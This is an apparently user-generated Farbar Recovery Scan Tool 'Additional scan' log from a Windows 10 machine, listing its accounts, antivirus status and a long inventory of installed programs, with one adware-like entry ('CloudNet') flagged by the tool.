Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24-11-2019
Ran by SR (24-11-2019 19:51:29)
Running from D:\Users\SR\Downloads
Windows 10 Pro Version 1803 17134.345 (X64) (2018-06-02 13:24:39)
Boot Mode: Normal
==========================================================

==================== Accounts: =============================

Administrator (S-1-5-21-3967059023-4107875624-2872843465-500 - Administrator - Disabled) => C:\Users\Administrator
DefaultAccount (S-1-5-21-3967059023-4107875624-2872843465-503 - Limited - Disabled)
Guest (S-1-5-21-3967059023-4107875624-2872843465-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-3967059023-4107875624-2872843465-1006 - Limited - Enabled)
SR (S-1-5-21-3967059023-4107875624-2872843465-1001 - Administrator - Enabled) => C:\Users\SR
WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version: - )
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated) Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe) Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated) Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated) Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft) Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft) Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft) aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft) aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft) AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.) Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version: - ) Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.) Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.) Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.) 
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version: - ) ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach) AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version: - ) Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk) AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos) Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com) Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.) BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.) Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation) Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation) Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version: - Cheat Engine) Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version: - Cheat Engine) ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase) Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - 
Microsoft Corporation) Hidden CloudNet (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\CloudNet) (Version: 20170301 - EpicNet Inc.) <==== ATTENTION Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version: - Stefan Meyer-Kahlen) Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions) DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - ) DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.) Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version: - EaseUS) E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version: - ) Entity Framework 6.2.0 Tools for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version: - SEIKO EPSON Corporation) Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION) Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - ) eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts) FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) 
Hidden FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.) Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic) Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software) FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version: - The Foundry) FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE) FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE) Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio) Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - ) Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - ) Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version: - ) Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries) Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin) Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.) Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google) Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot) Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.) 
HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version: - EFD Software) icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.) IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team) InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS) InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS) Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden iTools 3 (HKLM-x32\...\ThinkSky) (Version: - Shenzhen Thinksky Technology Co., Ltd.) iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.) iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.) 
Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation) Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation) Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation) Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen) Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - ) LLH5X (HKLM-x32\...\LLH5X) (Version: - ) LLH7X (HKLM-x32\...\LLH7X) (Version: - ) LLH8X (HKLM-x32\...\LLH8X) (Version: - ) LLH-Heli (HKLM-x32\...\LLH-Heli) (Version: - ) Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech) Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech) loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen) loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software) Malwarebytes version 3.8.3.2965 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.8.3.2965 - Malwarebytes) Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version: - The Foundry) Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74) MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore) MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.) 
Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH) mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray) MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version: - ) Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation) Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation) Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version: - ) Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation) Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation) Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation) Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.202.1013.0006 - Microsoft Corporation) Microsoft SQL Server 2012 Express LocalDB (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation) Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft 
Corporation) Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - 
Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation) Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation) Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation) Microsoft Visual 
Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation) MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.) Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla) Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla) Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla) Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich) MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation) Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments) Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team) Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team) NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA) NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation) NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation) NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - 
NVIDIA Corporation) NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation) NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation) NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation) OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.) OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA) Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) 
PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version: - Lexicon) PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH) PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.) PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes) qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project) Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd) QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.) RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner) RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations) Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version: - FIFA MASTER) REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.) 
rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC) Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson) Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico) SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version: - R.G. Mechanics, markfiter) SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com) Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation) 